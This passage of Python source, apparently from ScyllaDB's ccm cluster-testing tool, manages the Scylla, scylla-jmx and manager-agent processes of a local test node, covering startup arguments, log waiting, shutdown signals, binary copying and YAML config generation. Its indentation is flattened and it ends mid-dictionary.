# When running on ccm standalone, the waiter thread would block
# the create commands. Besides in that mode, waiting is unnecessary,
# since the original popen reference is garbage collected.
standalone = os.environ.get('SCYLLA_CCM_STANDALONE', None)
if standalone is None:
self._process_jmx_waiter = threading.Thread(target=self._wait_for_jmx)
# Don't block the main thread on abnormal shutdown
self._process_jmx_waiter.daemon = True
self._process_jmx_waiter.start()
pid_filename = os.path.join(self.get_path(), 'scylla-jmx.pid')
with open(pid_filename, 'w') as pid_file:
pid_file.write(str(self._process_jmx.pid))
# Wait for a starting node until it starts listening for CQL.
# Possibly poll the log for long-running offline processes, like
# bootstrap or resharding.
# Return True iff detected bootstrap or resharding processes in the log
def wait_for_starting(self, from_mark=None, timeout=120):
if from_mark is None:
from_mark = self.mark_log()
process=self._process_scylla
starting_message = 'Starting listening for CQL clients'
bootstrap_message = 'storage_service - JOINING: Starting to bootstrap'
resharding_message = r'(compaction|database) -.*Resharding'
if not self.watch_log_for("{}|{}|{}".format(starting_message, bootstrap_message, resharding_message), from_mark=from_mark, timeout=timeout, process=process):
return False
prev_mark = from_mark
prev_mark_time = time.time()
sleep_time = 10 if timeout >= 100 else 1
while not self.grep_log(starting_message, from_mark=from_mark):
process.poll()
if process.returncode is not None:
self.print_process_output(self.name, process, verbose=True)
if process.returncode != 0:
raise RuntimeError("The process is dead, returncode={}".format(process.returncode))
repair_pattern = r'repair - Repair \d+ out of \d+ ranges'
streaming_pattern = r'range_streamer - Bootstrap .* streaming .* ranges'
resharding_pattern = r'(compaction|database) -.*Resharded'
if self.grep_log("{}|{}|{}".format(repair_pattern, streaming_pattern, resharding_pattern), from_mark=prev_mark):
prev_mark = self.mark_log()
prev_mark_time = time.time()
elif time.time() - prev_mark_time >= timeout:
raise TimeoutError("{}: Timed out waiting for '{}'".format(self.name, starting_message))
time.sleep(sleep_time)
return bool(self.grep_log("{}|{}".format(bootstrap_message, resharding_message), from_mark=from_mark))
def _start_scylla(self, args, marks, update_pid, wait_other_notice,
wait_for_binary_proto, ext_env, timeout=None):
log_file = os.path.join(self.get_path(), 'logs', 'system.log')
# In case we are restarting a node
# we risk reading the old cassandra.pid file
self._delete_old_pid()
try:
env_copy = self._launch_env
except AttributeError:
env_copy = os.environ
env_copy['SCYLLA_HOME'] = self.get_path()
env_copy.update(ext_env)
with open(log_file, 'a') as scylla_log:
self._process_scylla = \
subprocess.Popen(args, stdout=scylla_log, stderr=scylla_log, close_fds=True, env=env_copy)
self._process_scylla.poll()
# When running on ccm standalone, the waiter thread would block
# the create commands. Besides in that mode, waiting is unnecessary,
# since the original popen reference is garbage collected.
standalone = os.environ.get('SCYLLA_CCM_STANDALONE', None)
if standalone is None:
self._process_scylla_waiter = threading.Thread(target=self._wait_for_scylla)
# Don't block the main thread on abnormal shutdown
self._process_scylla_waiter.daemon = True
self._process_scylla_waiter.start()
pid_filename = os.path.join(self.get_path(), 'cassandra.pid')
with open(pid_filename, 'w') as pid_file:
pid_file.write(str(self._process_scylla.pid))
if update_pid:
self._update_pid(self._process_scylla)
if not self.is_running():
raise NodeError("Error starting node %s" % self.name,
self._process_scylla)
if wait_other_notice:
for node, mark in marks:
t = timeout if timeout is not None else 120 if self.cluster.scylla_mode != 'debug' else 360
node.watch_log_for_alive(self, from_mark=mark, timeout=t)
if wait_for_binary_proto:
try:
t = timeout * 4 if timeout is not None else 420 if self.cluster.scylla_mode != 'debug' else 900
self.wait_for_binary_interface(from_mark=self.mark, process=self._process_scylla, timeout=t)
except TimeoutError as e:
if not self.wait_for_starting(from_mark=self.mark):
raise e
pass
return self._process_scylla
def _create_agent_config(self):
conf_file = os.path.join(self.get_conf_dir(), 'scylla-manager-agent.yaml')
ssl_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'scylla_test_ssl')
data = dict()
data['https'] = "{}:10001".format(self.address())
data['auth_token'] = self.scylla_manager.auth_token
data['tls_cert_file'] = os.path.join(ssl_dir, 'scylla-manager-agent.crt')
data['tls_key_file'] = os.path.join(ssl_dir, 'scylla-manager-agent.key')
data['logger'] = dict(level='debug')
data['debug'] = "{}:56112".format(self.address())
data['scylla'] = {'api_address': "{}".format(self.address()),
'api_port': 10000}
data['prometheus'] = "{}:56090".format(self.address())
data['s3'] = {"endpoint": os.getenv("AWS_S3_ENDPOINT"), "provider": "Minio"}
with open(conf_file, 'w') as f:
yaml.safe_dump(data, f, default_flow_style=False)
return conf_file
def update_agent_config(self, new_settings, restart_agent_after_change=True):
conf_file = os.path.join(self.get_conf_dir(), 'scylla-manager-agent.yaml')
with open(conf_file, 'r') as f:
current_config = yaml.safe_load(f)
current_config.update(new_settings)
with open(conf_file, 'w') as f:
yaml.safe_dump(current_config, f, default_flow_style=False)
if restart_agent_after_change:
self.restart_scylla_manager_agent(gently=True, recreate_config=False)
def start_scylla_manager_agent(self, create_config=True):
agent_bin = os.path.join(self.scylla_manager._get_path(), BIN_DIR, 'scylla-manager-agent')
log_file = os.path.join(self.get_path(), 'logs', 'system.log.manager_agent')
if create_config:
config_file = self._create_agent_config()
else:
config_file = os.path.join(self.get_conf_dir(), 'scylla-manager-agent.yaml')
args = [agent_bin,
'--config-file', config_file]
with open(log_file, 'a') as agent_log:
self._process_agent = subprocess.Popen(args, stdout=agent_log, stderr=agent_log, close_fds=True)
self._process_agent.poll()
# When running on ccm standalone, the waiter thread would block
# the create commands. Besides in that mode, waiting is unnecessary,
# since the original popen reference is garbage collected.
standalone = os.environ.get('SCYLLA_CCM_STANDALONE', None)
if standalone is None:
self._process_agent_waiter = threading.Thread(target=self._wait_for_agent)
# Don't block the main thread on abnormal shutdown
self._process_agent_waiter.daemon = True
self._process_agent_waiter.start()
pid_filename = os.path.join(self.get_path(), 'scylla-agent.pid')
with open(pid_filename, 'w') as pid_file:
pid_file.write(str(self._process_agent.pid))
with open(config_file, 'r') as f:
current_config = yaml.safe_load(f)
# Extracting currently configured port
current_listening_port = int(current_config['https'].split(":")[1])
api_interface = common.parse_interface(self.address(), current_listening_port)
if not common.check_socket_listening(api_interface, timeout=180):
raise Exception(
"scylla manager agent interface %s:%s is not listening after 180 seconds, scylla manager agent may have failed to start."
% (api_interface[0], api_interface[1]))
def restart_scylla_manager_agent(self, gently, recreate_config=True):
self.stop_scylla_manager_agent(gently=gently)
self.start_scylla_manager_agent(create_config=recreate_config)
def stop_scylla_manager_agent(self, gently):
if gently:
try:
self._process_agent.terminate()
except OSError:
pass
else:
try:
self._process_agent.kill()
except OSError:
pass
def _wait_java_up(self, ip_addr, jmx_port):
java_up = False
iteration = 0
while not java_up and iteration < 30:
iteration += 1
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as _socket:
try:
_socket.settimeout(1.0)
_socket.connect((ip_addr, jmx_port))
java_up = True
try:
_socket.close()
except:
pass
except (socket.timeout, ConnectionRefusedError):
pass
time.sleep(1)
return java_up
@property
def node_install_dir_version(self):
if not self.node_install_dir:
return ""
scylla_version_file_path = os.path.join(self.node_install_dir, CORE_PACKAGE_DIR_NAME, SCYLLA_VERSION_FILE)
if not os.path.exists(scylla_version_file_path):
print(f"'{scylla_version_file_path}' wasn't found")
return ""
with open(scylla_version_file_path, 'r') as f:
version = f.readline()
return version.strip()
# Scylla Overload start
def start(self, join_ring=True, no_wait=False, verbose=False,
update_pid=True, wait_other_notice=None, replace_token=None,
replace_address=None, jvm_args=None, wait_for_binary_proto=None,
profile_options=None, use_jna=False, quiet_start=False):
"""
Start the node. Options includes:
- join_ring: if false, start the node with -Dcassandra.join_ring=False
- no_wait: by default, this method returns when the node is started
and listening to clients.
If no_wait=True, the method returns sooner.
- wait_other_notice: if True, this method returns only when all other
live nodes of the cluster
have marked this node UP.
- replace_token: start the node with the -Dcassandra.replace_token
option.
- replace_address: start the node with the
-Dcassandra.replace_address option.
Extra command line options may be passed using the
SCYLLA_EXT_OPTS environment variable.
Extra environment variables for running scylla can be passed using the
SCYLLA_EXT_ENV environment variable.
Those are represented in a single string consisting of one or more
pairs of "var=value" separated by either space or semicolon (';')
"""
if wait_for_binary_proto is None:
wait_for_binary_proto = self.cluster.force_wait_for_cluster_start and not no_wait
if wait_other_notice is None:
wait_other_notice = self.cluster.force_wait_for_cluster_start and not no_wait
if jvm_args is None:
jvm_args = []
scylla_cassandra_mapping = {'-Dcassandra.replace_address_first_boot':
'--replace-address-first-boot'}
# Replace args in the form
# ['-Dcassandra.foo=bar'] to ['-Dcassandra.foo', 'bar']
translated_args = []
new_jvm_args = []
for jvm_arg in jvm_args:
if '=' in jvm_arg:
split_option = jvm_arg.split("=")
e_msg = ("Option %s not in the form '-Dcassandra.foo=bar'. "
"Please check your test" % jvm_arg)
assert len(split_option) == 2, e_msg
option, value = split_option
# If we have information on how to translate the jvm option,
# translate it
if option in scylla_cassandra_mapping:
translated_args += [scylla_cassandra_mapping[option],
value]
# Otherwise, just pass it as is
else:
new_jvm_args.append(jvm_arg)
else:
new_jvm_args.append(jvm_arg)
jvm_args = new_jvm_args
if self.is_running():
raise NodeError("%s is already running" % self.name)
if not self.is_docker():
for itf in list(self.network_interfaces.values()):
if itf is not None and replace_address is None:
try:
common.check_socket_available(itf)
except Exception as msg:
print("{}. Looking for offending processes...".format(msg))
for proc in psutil.process_iter():
if any(self.cluster.ipprefix in cmd for cmd in proc.cmdline()):
print("name={} pid={} cmdline={}".format(proc.name(), proc.pid, proc.cmdline()))
raise msg
marks = []
if wait_other_notice:
marks = [(node, node.mark_log()) for node in
list(self.cluster.nodes.values()) if node.is_live()]
self.mark = self.mark_log()
launch_bin = common.join_bin(self.get_path(), BIN_DIR, 'scylla')
options_file = os.path.join(self.get_path(), 'conf', 'scylla.yaml')
# TODO: we do not support forcing specific settings
# TODO: workaround for api-address as we do not load it
# from config file scylla#59
conf_file = os.path.join(self.get_conf_dir(), common.SCYLLA_CONF)
with open(conf_file, 'r') as f:
data = yaml.safe_load(f)
jvm_args = jvm_args + ['--api-address', data['api_address']]
jvm_args = jvm_args + ['--collectd-hostname',
'%s.%s' % (socket.gethostname(), self.name)]
# Let's add jvm_args and the translated args
args = [launch_bin, '--options-file', options_file, '--log-to-stdout', '1'] + jvm_args + translated_args
# Lets search for default overrides in SCYLLA_EXT_OPTS
scylla_ext_opts = os.getenv('SCYLLA_EXT_OPTS', "").split()
opts_i = 0
orig_args = list(args)
while opts_i < len(scylla_ext_opts):
if scylla_ext_opts[opts_i].startswith("--scylla-manager="):
opts_i += 1
elif scylla_ext_opts[opts_i].startswith('-'):
o = scylla_ext_opts[opts_i]
opts_i += 1
if '=' in o:
opt = o.replace('=', ' ', 1).split()
else:
opt = [ o ]
while opts_i < len(scylla_ext_opts) and not scylla_ext_opts[opts_i].startswith('-'):
opt.append(scylla_ext_opts[opts_i])
opts_i += 1
if opt[0] not in orig_args:
args.extend(opt)
if '--developer-mode' not in args:
args += ['--developer-mode', 'true']
if '--smp' not in args:
# If --smp is not passed from cmdline, use default (--smp 1)
args += ['--smp', str(self._smp)]
elif self._smp_set_during_test:
# If node.set_smp() is called during the test, ignore the --smp
# passed from the cmdline.
args[args.index('--smp') + 1] = str(self._smp)
else:
# Update self._smp based on command line parameter.
# It may be used below, along with self._mem_mb_per_cpu, for calculating --memory
self._smp = int(args[args.index('--smp') + 1])
if '--memory' not in args:
# If --memory is not passed from cmdline, use default (512M per cpu)
args += ['--memory', '{}M'.format(self._mem_mb_per_cpu * self._smp)]
elif self._mem_set_during_test:
# If node.set_mem_mb_per_cpu() is called during the test, ignore the --memory
# passed from the cmdline.
args[args.index('--memory') + 1] = '{}M'.format(self._mem_mb_per_cpu * self._smp)
if '--default-log-level' not in args:
args += ['--default-log-level', self.__global_log_level]
if self.scylla_mode() == 'debug' and '--blocked-reactor-notify-ms' not in args:
args += ['--blocked-reactor-notify-ms', '5000']
# TODO add support for classes_log_level
if '--collectd' not in args:
args += ['--collectd', '0']
if '--cpuset' not in args:
args += ['--overprovisioned']
if '--prometheus-address' not in args:
args += ['--prometheus-address', data['api_address']]
if replace_address:
args += ['--replace-address', replace_address]
args += ['--unsafe-bypass-fsync', '1']
# The '--kernel-page-cache' was introduced by
# https://github.com/scylladb/scylla/commit/8785dd62cb740522d80eb12f8272081f85be9b7e from 4.5 version
current_node_version = self.node_install_dir_version
if current_node_version and LooseVersion('666.development') < LooseVersion(current_node_version) >= LooseVersion('4.5'):
args += ['--kernel-page-cache', '1']
ext_env = {}
scylla_ext_env = os.getenv('SCYLLA_EXT_ENV', "").strip()
if scylla_ext_env:
scylla_ext_env = re.split(r'[; ]', scylla_ext_env)
for s in scylla_ext_env:
try:
[k, v] = s.split('=', 1)
except ValueError as e:
print("Bad SCYLLA_EXT_ENV variable: {}: {}", s, e)
else:
ext_env[k] = v
message = "Starting scylla: args={} wait_other_notice={} wait_for_binary_proto={}".format(args, wait_other_notice, wait_for_binary_proto)
self.debug(message)
scylla_process = self._start_scylla(args, marks, update_pid,
wait_other_notice,
wait_for_binary_proto,
ext_env)
self._start_jmx(data)
ip_addr, _ = self.network_interfaces['thrift']
jmx_port = int(self.jmx_port)
if not self._wait_java_up(ip_addr, jmx_port):
e_msg = "Error starting node {}: unable to connect to scylla-jmx port {}:{}".format(
self.name, ip_addr, jmx_port)
raise NodeError(e_msg, scylla_process)
self.is_running()
if self.scylla_manager and self.scylla_manager.is_agent_available:
self.start_scylla_manager_agent()
return scylla_process
def start_dse(self,
join_ring=True,
no_wait=False,
verbose=False,
update_pid=True,
wait_other_notice=False,
replace_token=None,
replace_address=None,
jvm_args=None,
wait_for_binary_proto=False,
profile_options=None,
use_jna=False):
"""
Start the node. Options includes:
- join_ring: if false, start the node with -Dcassandra.join_ring=False
- no_wait: by default, this method returns when the node is started
and listening to clients.
If no_wait=True, the method returns sooner.
- wait_other_notice: if True, this method returns only when all other
live nodes of the cluster have marked this node UP.
- replace_token: start the node with the -Dcassandra.replace_token
option.
- replace_address: start the node with the
-Dcassandra.replace_address option.
"""
if jvm_args is None:
jvm_args = []
raise NotImplementedError('ScyllaNode.start_dse')
def _update_jmx_pid(self, wait=True):
pidfile = os.path.join(self.get_path(), 'scylla-jmx.pid')
start = time.time()
while not (os.path.isfile(pidfile) and os.stat(pidfile).st_size > 0):
elapsed = time.time() - start
if elapsed > 30.0 or not wait:
if wait:
print_("Timed out waiting for pidfile {} to be filled (after {} seconds): File {} size={}".format(
pidfile,
elapsed,
'exists' if os.path.isfile(pidfile) else 'does not exist' if not os.path.exists(pidfile) else 'is not a file',
os.stat(pidfile).st_size if os.path.exists(pidfile) else -1))
break
else:
time.sleep(0.1)
if os.path.isfile(pidfile) and os.stat(pidfile).st_size > 0:
try:
with open(pidfile, 'r') as f:
self.jmx_pid = int(f.readline().strip())
except IOError as e:
raise NodeError('Problem starting node %s scylla-jmx due to %s' %
(self.name, e))
else:
self.jmx_pid = None
def nodetool(self, *args, **kwargs):
"""
Kill scylla-jmx in case of timeout, to supply enough debugging information
"""
try:
return super().nodetool(*args, **kwargs)
except subprocess.TimeoutExpired:
self.error("nodetool timeout, going to kill scylla-jmx with SIGQUIT")
self.kill_jmx(signal.SIGQUIT)
time.sleep(5) # give the java process time to print the threaddump into the log
raise
def kill_jmx(self, __signal):
if self.jmx_pid:
os.kill(self.jmx_pid, __signal)
def _update_scylla_agent_pid(self):
pidfile = os.path.join(self.get_path(), 'scylla-agent.pid')
start = time.time()
while not (os.path.isfile(pidfile) and os.stat(pidfile).st_size > 0):
if time.time() - start > 30.0:
print_("Timed out waiting for pidfile {} to be filled (current time is %s): File {} size={}".format(
pidfile,
datetime.now(),
'exists' if os.path.isfile(pidfile) else 'does not exist' if not os.path.exists(pidfile) else 'is not a file',
os.stat(pidfile).st_size if os.path.exists(pidfile) else -1))
break
else:
time.sleep(0.1)
try:
with open(pidfile, 'r') as f:
self.agent_pid = int(f.readline().strip())
except IOError as e:
raise NodeError('Problem starting node %s scylla-agent due to %s' %
(self.name, e))
def do_stop(self, gently=True):
"""
Stop the node.
- gently: Let Scylla and Scylla JMX clean up and shut down properly.
Otherwise do a 'kill -9' which shuts down faster.
"""
did_stop = False
self._update_jmx_pid(wait=False)
if self.scylla_manager and self.scylla_manager.is_agent_available:
self._update_scylla_agent_pid()
for proc in [self._process_jmx, self._process_scylla, self._process_agent]:
if proc:
did_stop = True
if gently:
try:
proc.terminate()
except OSError:
pass
else:
try:
proc.kill()
except OSError:
pass
else:
signal_mapping = {True: signal.SIGTERM, False: signal.SIGKILL}
for pid in [self.jmx_pid, self.pid, self.agent_pid]:
if pid:
did_stop = True
try:
os.kill(pid, signal_mapping[gently])
except OSError:
pass
return did_stop
def _wait_until_stopped(self, wait_seconds):
start_time = time.time()
wait_time_sec = 1
while True:
if not self.is_running():
return True
elapsed = time.time() - start_time
if elapsed >= wait_seconds:
return False
time.sleep(wait_time_sec)
if elapsed + wait_time_sec > wait_seconds:
wait_time_sec = wait_seconds - elapsed
elif wait_time_sec <= 16:
wait_time_sec *= 2
def wait_until_stopped(self, wait_seconds=None, marks=[], dump_core=True):
"""
Wait until the node is stopped after do_stop was called.
- wait_seconds: how long to wait for a graceful stop before escalating.
- marks: optional list of (node, mark) to call watch_log_for_death on.
- dump_core: if the node does not stop in time, send SIGQUIT first so a
core dump can be generated before falling back to SIGKILL.
"""
if wait_seconds is None:
wait_seconds = 127 if self.scylla_mode() != 'debug' else 600
start = time.time()
if self.is_running():
if not self._wait_until_stopped(wait_seconds):
if dump_core and self.pid:
# Aborting is intended to generate a core dump
# so the reason the node didn't stop normally can be studied.
self.warning("{} is still running after {} seconds. Trying to generate coredump using kill({}, SIGQUIT)...".format(
self.name, wait_seconds, self.pid))
try:
os.kill(self.pid, signal.SIGQUIT)
except OSError:
pass
self._wait_until_stopped(300)
if self.is_running() and self.pid:
self.warning("{} is still running after {} seconds. Killing process using kill({}, SIGKILL)...".format(
self.name, wait_seconds, self.pid))
os.kill(self.pid, signal.SIGKILL)
self._wait_until_stopped(10)
while self.jmx_pid and time.time() - start < wait_seconds:
try:
os.kill(self.jmx_pid, 0)
time.sleep(1)
except OSError:
self.jmx_pid = None
pass
if self.jmx_pid:
try:
self.warning("{} scylla-jmx is still running. Killing process using kill({}, SIGKILL)...".format(
self.name, wait_seconds, self.jmx_pid))
os.kill(self.jmx_pid, signal.SIGKILL)
except OSError:
pass
if self.is_running():
raise NodeError("Problem stopping node %s" % self.name)
for node, mark in marks:
if node != self:
node.watch_log_for_death(self, from_mark=mark)
def stop(self, wait=True, wait_other_notice=False, other_nodes=None, gently=True, wait_seconds=None, marks=[]):
"""
Stop the node.
- wait: if True (the default), wait for the Scylla process to be
really dead. Otherwise return after having sent the kill signal.
stop() will wait up to wait_seconds, by default 127 seconds
(or 600 in debug mode), for the Scylla process to stop gracefully.
After this wait, it will try to kill the node using SIGQUIT,
and if that failed, it will throw an
exception stating it couldn't stop the node.
- wait_other_notice: return only when the other live nodes of the
cluster have marked this node as dead.
- other_nodes: optional list of nodes to apply wait_other_notice on.
- marks: optional list of (node, mark) to call watch_log_for_death on.
- gently: Let Scylla and Scylla JMX clean up and shut down properly.
Otherwise do a 'kill -9' which shuts down faster.
"""
was_running = self.is_running()
if was_running:
if wait_other_notice:
if not other_nodes:
other_nodes = list(self.cluster.nodes.values())
if not marks:
marks = [(node, node.mark_log()) for node in
other_nodes if
node.is_live() and node is not self]
self.do_stop(gently=gently)
if wait or wait_other_notice:
self.wait_until_stopped(wait_seconds, marks, dump_core=gently)
return was_running
def import_config_files(self):
# TODO: override node - enable logging
self._create_directory()
self._update_config()
self.copy_config_files()
self.update_yaml()
self.__copy_logback_files()
def copy_config_files(self):
Node.copy_config_files(self)
conf_pattern = os.path.join(self.get_tools_java_dir(), 'conf', "jvm*.options")
for filename in glob.glob(conf_pattern):
if os.path.isfile(filename):
shutil.copy(filename, self.get_conf_dir())
def get_tools_java_dir(self):
return common.get_tools_java_dir(self.node_install_dir)
def get_jmx_dir(self, relative_repos_root):
return os.environ.get('SCYLLA_JMX_DIR', os.path.join(self.node_install_dir, relative_repos_root, 'scylla-jmx'))
def __copy_logback_files(self):
shutil.copy(os.path.join(self.get_tools_java_dir(), 'conf', 'logback-tools.xml'),
os.path.join(self.get_conf_dir(), 'logback-tools.xml'))
def import_dse_config_files(self):
raise NotImplementedError('ScyllaNode.import_dse_config_files')
def copy_config_files_dse(self):
raise NotImplementedError('ScyllaNode.copy_config_files_dse')
def clean_runtime_file(self):
"""Remove cassandra.in.sh file that created runtime during cluster build """
cassandra_in_sh = os.path.join(self.get_node_cassandra_root(), BIN_DIR, CASSANDRA_SH)
if os.path.exists(cassandra_in_sh):
os.remove(cassandra_in_sh)
def hard_link_or_copy(self, src, dst, extra_perms=0, always_copy=False, replace=False):
def do_copy(src, dst, extra_perms=0):
shutil.copy(src, dst)
os.chmod(dst, os.stat(src).st_mode | extra_perms)
if always_copy:
return do_copy(src, dst, extra_perms)
if os.path.exists(dst) and replace:
os.remove(dst)
try:
os.link(src, dst)
except OSError as oserror:
if oserror.errno == errno.EXDEV or oserror.errno == errno.EMLINK:
do_copy(src, dst, extra_perms)
else:
raise RuntimeError("Unable to create hard link from %s to %s: %s" % (src, dst, oserror))
def _copy_binaries(self, files, src_path, dest_path, exist_ok=False, replace=False, extra_perms=0):
os.makedirs(dest_path, exist_ok=exist_ok)
for name in files:
self.hard_link_or_copy(src=os.path.join(src_path, name),
dst=os.path.join(dest_path, name),
extra_perms=extra_perms,
replace=replace)
def import_bin_files(self, exist_ok=False, replace=False):
# selectively copying files to reduce risk of using unintended items
self._copy_binaries(files=[CASSANDRA_SH, 'nodetool'],
src_path=os.path.join(self.get_tools_java_dir(), BIN_DIR),
dest_path=os.path.join(self.get_path(), 'resources', 'cassandra', BIN_DIR),
exist_ok=exist_ok,
replace=replace
)
# selectively copying files to reduce risk of using unintended items
# Copy sstable tools
self._copy_binaries(files=['sstabledump', 'sstablelevelreset', 'sstablemetadata',
'sstablerepairedset', 'sstablesplit'],
src_path=os.path.join(self.get_tools_java_dir(), 'tools', BIN_DIR),
dest_path=os.path.join(self.get_path(), 'resources', 'cassandra', 'tools', BIN_DIR),
exist_ok=exist_ok,
replace=replace
)
# TODO: - currently no scripts only executable - copying exec
if self.is_scylla_reloc():
relative_repos_root = '../..'
self.hard_link_or_copy(src=os.path.join(self.node_install_dir, BIN_DIR, 'scylla'),
dst=os.path.join(self.get_bin_dir(), 'scylla'),
extra_perms=stat.S_IEXEC,
replace=replace)
os.environ['GNUTLS_SYSTEM_PRIORITY_FILE'] = os.path.join(self.node_install_dir, 'scylla-core-package/libreloc/gnutls.config')
else:
relative_repos_root = '..'
src = os.path.join(self.get_install_dir(), 'build', self.scylla_mode(), 'scylla')
dst = os.path.join(self.get_bin_dir(), 'scylla')
dbuild_so_dir = os.environ.get('SCYLLA_DBUILD_SO_DIR')
if not dbuild_so_dir:
self.hard_link_or_copy(src, dst, stat.S_IEXEC)
else:
self.hard_link_or_copy(src, dst, stat.S_IEXEC, always_copy=True)
search_pattern = os.path.join(dbuild_so_dir, 'ld-linux-x86-64.so.*')
res = glob.glob(search_pattern)
if not res:
raise RuntimeError('{} not found'.format(search_pattern))
if len(res) > 1:
raise RuntimeError('{}: found too many matches: {}'.format(search_pattern, res))
loader = res[0]
self._launch_env = dict(os.environ)
self._launch_env['LD_LIBRARY_PATH'] = dbuild_so_dir
patchelf_cmd = [loader, os.path.join(dbuild_so_dir, 'patchelf'), '--set-interpreter', loader, dst]
def run_patchelf(patchelf_cmd):
p = subprocess.Popen(patchelf_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=self._launch_env)
(stdout, stderr) = p.communicate()
return (p.returncode, stdout, stderr)
(returncode, stdout, stderr) = run_patchelf(patchelf_cmd)
if returncode != 0:
# Retry after stripping binary if hit
# https://github.com/scylladb/scylla/issues/5245
if stderr == 'read\n':
cmd = ['strip', dst]
subprocess.check_call(cmd)
(returncode, stdout, stderr) = run_patchelf(patchelf_cmd)
if returncode != 0:
raise RuntimeError('{} exited with status {}.\nstdout:{}\nstderr:\n{}'.format(patchelf_cmd, returncode, stdout, stderr))
if 'scylla-repository' in self.node_install_dir:
self.hard_link_or_copy(os.path.join(self.node_install_dir, 'scylla-jmx', 'scylla-jmx-1.0.jar'),
os.path.join(self.get_bin_dir(), 'scylla-jmx-1.0.jar'), replace=replace)
self.hard_link_or_copy(os.path.join(self.node_install_dir, 'scylla-jmx', 'scylla-jmx'),
os.path.join(self.get_bin_dir(), 'scylla-jmx'), replace=replace)
else:
self.hard_link_or_copy(os.path.join(self.get_jmx_dir(relative_repos_root), 'target', 'scylla-jmx-1.0.jar'),
os.path.join(self.get_bin_dir(), 'scylla-jmx-1.0.jar'))
self.hard_link_or_copy(os.path.join(self.get_jmx_dir(relative_repos_root), 'scripts', 'scylla-jmx'),
os.path.join(self.get_bin_dir(), 'scylla-jmx'))
os.makedirs(os.path.join(self.get_bin_dir(), 'symlinks'), exist_ok=exist_ok)
scylla_jmx_file = os.path.join(self.get_bin_dir(), 'symlinks', 'scylla-jmx')
if os.path.exists(scylla_jmx_file) and replace:
os.remove(scylla_jmx_file)
os.symlink('/usr/bin/java', scylla_jmx_file)
parent_dir = os.path.dirname(os.path.realpath(__file__))
resources_bin_dir = os.path.join(parent_dir, 'resources', BIN_DIR)
for name in os.listdir(resources_bin_dir):
filename = os.path.join(resources_bin_dir, name)
if os.path.isfile(filename):
shutil.copy(filename, self.get_bin_dir())
common.add_exec_permission(self.get_bin_dir(), name)
def _save(self):
# TODO: - overwrite node
self.update_yaml()
self._update_config()
def update_yaml(self):
# TODO: copied from node.py
conf_file = os.path.join(self.get_conf_dir(), common.SCYLLA_CONF)
with open(conf_file, 'r') as f:
data = yaml.safe_load(f)
data['cluster_name'] = self.cluster.name
data['auto_bootstrap'] = self.auto_bootstrap
data['initial_token'] = self.initial_token
if (not self.cluster.use_vnodes and
self.get_base_cassandra_version() >= 1.2):
data['num_tokens'] = 1
if 'seeds' in data:
# cassandra 0.7
data['seeds'] = self.cluster.get_seeds()
else:
# cassandra 0.8
data['seed_provider'][0]['parameters'][0]['seeds'] = (
','.join(self.cluster.get_seeds()))
data['listen_address'], data['storage_port'] = (
self.network_interfaces['storage'])
data['rpc_address'], data['rpc_port'] = (
self.network_interfaces['thrift'])
if (self.network_interfaces['binary'] is not None and
self.get_base_cassandra_version() >= 1.2):
_, data['native_transport_port'] = self.network_interfaces['binary']
data['data_file_directories'] = [os.path.join(self.get_path(), 'data')]
data['commitlog_directory'] = os.path.join(self.get_path(),
'commitlogs')
data['hints_directory'] = os.path.join(self.get_path(), 'hints')
data['saved_caches_directory'] = os.path.join(self.get_path(),
'saved_caches')
data['view_hints_directory'] = os.path.join(self.get_path(), 'view_hints')
if self.cluster.partitioner:
data['partitioner'] = self.cluster.partitioner
# TODO: add scylla options
data['api_address'] = data['listen_address']
# last win and we want node options to win
full_options = dict(list(self.cluster._config_options.items()) +
list(self.get_config_options().items()))
for name in full_options:
value = full_options[name]
if value is None:
try:
del data[name]
except KeyError:
# it is fine to remove a key that is not there
pass
else:
try:
if isinstance(data[name], dict):
for option in full_options[name]:
data[name][option] = full_options[name][option]
else:
data[name] = full_options[name]
except KeyError:
data[name] = full_options[name]
if 'alternator_port' in data or 'alternator_https_port' in data:
data['alternator_address'] = data['listen_address']
with open(conf_file, 'w') as f:
yaml.safe_dump(data, f, default_flow_style=False)
# TODO: - for now create a cassandra conf file leaving only
# cassandra config items - this should be removed once tools are
# updated to remove scylla conf and use a shrunk version
cassandra_conf_file = os.path.join(self.get_conf_dir(),
common.CASSANDRA_CONF)
cassandra_conf_items = {'authenticator': 0,
'authorizer': 0,
'auto_snapshot': 0,
'batch_size_warn_threshold_in_kb': 0,
'batchlog_replay_throttle_in_kb': 0,
'broadcast_address': 0,
'broadcast_rpc_address': 0,
'cas_contention_timeout_in_ms': 0,
'client_encryption_options': 0,
'cluster_name': 0,
'column_index_size_in_kb': 0,
'commit_failure_policy': 0,
'commitlog_directory': 0,
'commitlog_segment_size_in_mb': 0,
'commitlog_sync': 0,
'commitlog_sync_batch_window_in_ms': 0,
'commitlog_sync_period_in_ms': 0,
'commitlog_total_space_in_mb': 0,
'compaction_large_partition_warning_threshold_mb': 0,
'compaction_throughput_mb_per_sec': 0,
'concurrent_compactors': 0,
'concurrent_counter_writes': 0,
'concurrent_reads': 0,
'concurrent_writes': 0,
'counter_cache_keys_to_save': 0,
'counter_cache_save_period': 0,
'counter_cache_size_in_mb': 0,
'counter_write_request_timeout_in_ms': 0,
'cross_node_timeout': 0,
'data_file_directories': 0,
'disk_failure_policy': 0,
'dynamic_snitch_badness_threshold': 0,
'dynamic_snitch_reset_interval_in_ms': 0,
'dynamic_snitch_update_interval_in_ms': 0,
'endpoint_snitch': 0,
'file_cache_size_in_mb': 0,
'hinted_handoff_enabled': 0,
'hinted_handoff_throttle_in_kb': 0,
'incremental_backups': 0,
'index_summary_capacity_in_mb': 0,
'index_summary_resize_interval_in_minutes': 0,
'inter_dc_stream_throughput_outbound_megabits_per_sec': 0,
'inter_dc_tcp_nodelay': 0,
'internode_authenticator': 0,
'internode_compression': 0,
'key_cache_keys_to_save': 0,
'key_cache_save_period': 0,
'key_cache_size_in_mb': 0,
'listen_address': 0,
'listen_interface': 0,
'listen_interface_prefer_ipv6': 0,
'max_hint_window_in_ms': 0,
'max_hints_delivery_threads': 0,
'memory_allocator': 0,
'memtable_allocation_type': 0,
'memtable_cleanup_threshold': 0,
'memtable_flush_writers': 0,
'memtable_heap_space_in_mb': 0,
'memtable_offheap_space_in_mb': 0,
'native_transport_max_concurrent_connections': 0,
'native_transport_max_concurrent_connections_per_ip': 0,
'native_transport_max_frame_size_in_mb': 0,
'native_transport_max_threads': 0,
'native_transport_port': 0,
